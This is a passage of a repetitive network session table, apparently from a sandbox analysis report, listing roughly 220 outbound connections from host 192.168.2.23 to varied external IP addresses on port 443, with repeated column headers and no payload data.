                                            28990192.168.2.2334530130.110.83.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28991192.168.2.2356820144.117.218.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28992192.168.2.2343696163.208.204.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28993192.168.2.235666827.140.124.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28994192.168.2.235437634.137.79.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28995192.168.2.235917827.223.164.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28996192.168.2.233927631.44.107.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28997192.168.2.235872065.173.95.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28998192.168.2.2340168176.19.33.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28999192.168.2.235183642.159.175.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29000192.168.2.2352436155.131.233.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29001192.168.2.2351082165.86.6.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29002192.168.2.2350016164.146.172.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29003192.168.2.2355664170.254.152.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29004192.168.2.235639890.243.89.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29005192.168.2.2336778126.19.192.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29006192.168.2.2350718119.165.135.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29007192.168.2.234414673.203.228.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29008192.168.2.2344684154.102.133.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29009192.168.2.235622638.131.136.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29010192.168.2.2333850182.208.168.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29011192.168.2.2336518133.101.176.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29012192.168.2.233956040.215.13.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29013192.168.2.2360724162.77.208.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29014192.168.2.234601431.215.154.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29015192.168.2.235063646.60.111.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29016192.168.2.2349000184.21.101.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29017192.168.2.2336740158.68.173.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29018192.168.2.234099839.97.4.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29019192.168.2.2356918138.245.146.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29020192.168.2.233435892.125.10.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29021192.168.2.2347128133.192.161.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29022192.168.2.234543867.14.155.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29023192.168.2.235994858.118.166.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29024192.168.2.2348114165.134.131.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29025192.168.2.235051840.189.41.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29026192.168.2.235894497.247.106.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29027192.168.2.2338164125.179.72.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29028192.168.2.2342120201.5.66.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29029192.168.2.234675070.53.59.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29030192.168.2.2336794157.81.183.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29031192.168.2.235969872.249.214.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29032192.168.2.233532889.184.83.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29033192.168.2.233951040.237.57.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29034192.168.2.234282077.183.108.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29035192.168.2.2333494126.133.87.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29036192.168.2.2336912173.137.4.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29037192.168.2.235287235.9.62.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29038192.168.2.236090686.130.188.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29039192.168.2.2344150128.116.72.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29040192.168.2.2358782186.21.211.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29041192.168.2.234700859.219.178.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29042192.168.2.2333282204.212.6.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29043192.168.2.235242864.160.83.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29044192.168.2.2360078197.29.100.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29045192.168.2.2335698103.180.166.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29046192.168.2.2352348104.37.220.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29047192.168.2.2349984221.222.189.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29048192.168.2.2350936204.74.14.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29049192.168.2.233442865.219.103.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29050192.168.2.2350162189.218.148.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29051192.168.2.2355310211.60.54.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29052192.168.2.235378680.59.78.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29053192.168.2.2359618179.41.187.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29054192.168.2.233787466.189.102.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29055192.168.2.234933070.48.150.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29056192.168.2.235953897.190.16.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29057192.168.2.235858693.231.109.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29058192.168.2.23445749.127.4.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29059192.168.2.2359536220.67.188.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29060192.168.2.2340610195.151.111.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29061192.168.2.2345664171.197.239.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29062192.168.2.235963617.105.22.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29063192.168.2.2340920151.236.34.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29064192.168.2.2339664134.187.145.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29065192.168.2.2359596121.121.51.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29066192.168.2.2351940191.170.224.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29067192.168.2.2334656110.26.214.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29068192.168.2.233889495.135.35.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29069192.168.2.234874278.15.84.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29070192.168.2.2341882156.25.91.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29071192.168.2.234710674.160.54.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29072192.168.2.2338856168.65.220.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29073192.168.2.2340978138.88.162.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29074192.168.2.233988691.131.157.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29075192.168.2.2337768154.113.217.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29076192.168.2.2333394135.128.107.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29077192.168.2.235935269.18.238.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29078192.168.2.2351262202.218.97.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29079192.168.2.235627854.25.120.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29080192.168.2.233332413.187.99.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29081192.168.2.23411884.224.236.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29082192.168.2.2343398219.199.187.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29083192.168.2.2352046121.38.60.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29084192.168.2.2341950167.4.28.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29085192.168.2.233486644.192.57.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29086192.168.2.234453267.253.60.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29087192.168.2.233309812.208.94.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29088192.168.2.2348342174.193.250.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29089192.168.2.233398061.27.113.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29090192.168.2.2353358102.26.167.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29091192.168.2.2343638146.147.183.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29092192.168.2.235514449.138.124.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29093192.168.2.235760868.200.87.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29094192.168.2.2358614182.226.69.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29095192.168.2.233419271.37.9.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29096192.168.2.235331498.66.247.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29097192.168.2.235877694.15.204.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29098192.168.2.23606109.76.231.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29099192.168.2.2334484137.171.38.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29100192.168.2.2338634172.199.142.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29101192.168.2.2348842131.133.76.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29102192.168.2.233785858.231.253.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29103192.168.2.235320476.196.12.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29104192.168.2.2336330114.173.201.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29105192.168.2.235742223.255.205.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29106192.168.2.2345610148.124.91.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29107192.168.2.234952466.142.111.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29108192.168.2.235694670.153.208.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29109192.168.2.235186849.108.234.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29110192.168.2.2354662187.144.161.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29111192.168.2.234635853.83.165.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29112192.168.2.234924479.98.39.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29113192.168.2.23526202.148.229.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29114192.168.2.233600814.169.188.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29115192.168.2.2337604135.125.250.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29116192.168.2.2359566169.115.199.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29117192.168.2.234549444.126.13.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29118192.168.2.2348392222.140.191.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29119192.168.2.2354512205.112.30.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29120192.168.2.2351232145.172.78.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29121192.168.2.2333414165.235.251.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29122192.168.2.2334752159.228.113.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29123192.168.2.234631235.240.249.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29124192.168.2.234821675.146.105.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29125192.168.2.2346876180.0.237.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29126192.168.2.2338020149.97.5.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29127192.168.2.2334930178.248.17.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29128192.168.2.234926235.183.173.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29129192.168.2.2335944145.225.77.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29130192.168.2.2343268117.116.233.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29131192.168.2.233887076.79.57.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29132192.168.2.235675668.173.204.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29133192.168.2.2346398202.88.237.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29134192.168.2.2342350188.179.199.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29135192.168.2.2343306218.117.10.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29136192.168.2.2347836126.241.125.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29137192.168.2.234782874.164.230.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29138192.168.2.235485224.129.30.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29139192.168.2.235043858.17.141.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29140192.168.2.234364251.57.72.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29141192.168.2.233490664.219.28.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29142192.168.2.2340450116.236.216.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29143192.168.2.2336974126.149.143.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29144192.168.2.2340242151.215.82.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29145192.168.2.2343010124.0.178.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29146192.168.2.234908285.87.42.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29147192.168.2.2360958188.113.125.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29148192.168.2.23382528.230.155.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29149192.168.2.233417847.229.172.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29150192.168.2.235988297.38.82.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29151192.168.2.2356384107.110.62.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29152192.168.2.235429450.145.77.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29153192.168.2.2351876160.212.103.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29154192.168.2.2353302184.213.63.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29155192.168.2.234808442.248.217.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29156192.168.2.2345702124.128.17.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29157192.168.2.235463013.54.23.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29158192.168.2.235505075.160.226.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29159192.168.2.2340542102.26.155.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29160192.168.2.2355662112.205.200.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29161192.168.2.2333344119.223.149.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29162192.168.2.23448401.59.91.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29163192.168.2.23385961.229.184.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29164192.168.2.2343114114.209.32.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29165192.168.2.2346190217.52.197.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29166192.168.2.233672074.24.252.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29167192.168.2.235191270.227.60.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29168192.168.2.2345132176.156.49.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29169192.168.2.233349627.157.50.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29170192.168.2.2353526111.149.205.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29171192.168.2.234989498.77.48.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29172192.168.2.233416666.163.74.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29173192.168.2.2345584182.12.167.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29174192.168.2.2359854197.181.67.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29175192.168.2.233519244.10.131.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29176192.168.2.2337690203.184.219.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29177192.168.2.2351514124.44.208.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29178192.168.2.2360484188.168.192.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29179192.168.2.2351330168.61.185.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29180192.168.2.234691459.238.30.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29181192.168.2.2345998169.75.16.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29182192.168.2.2341364164.201.74.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29183192.168.2.233600220.240.9.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29184192.168.2.2352504131.150.11.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29185192.168.2.234723652.210.22.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29186192.168.2.2355002111.144.63.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29187192.168.2.2345224221.93.19.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29188192.168.2.235779818.124.11.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29189192.168.2.2360784138.89.185.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29190192.168.2.2360056161.45.225.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29191192.168.2.235710864.109.154.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29192192.168.2.2359482194.74.153.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29193192.168.2.2357546189.25.152.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29194192.168.2.2356666213.1.83.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29195192.168.2.2335962111.99.244.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29196192.168.2.234986285.243.13.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29197192.168.2.2333968197.88.68.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29198192.168.2.2356402136.172.182.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29199192.168.2.23464185.96.88.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29200192.168.2.233421878.190.59.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29201192.168.2.2358970194.236.35.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29202192.168.2.234853842.59.112.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29203192.168.2.235405454.186.7.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29204192.168.2.235705054.122.191.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29205192.168.2.2342940132.8.151.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29206192.168.2.235758219.159.247.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29207192.168.2.234273436.117.199.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29208192.168.2.233667098.47.8.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29209192.168.2.2346220186.126.86.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29210192.168.2.2340684109.165.183.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            29211192.168.2.2356378110.196.74.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
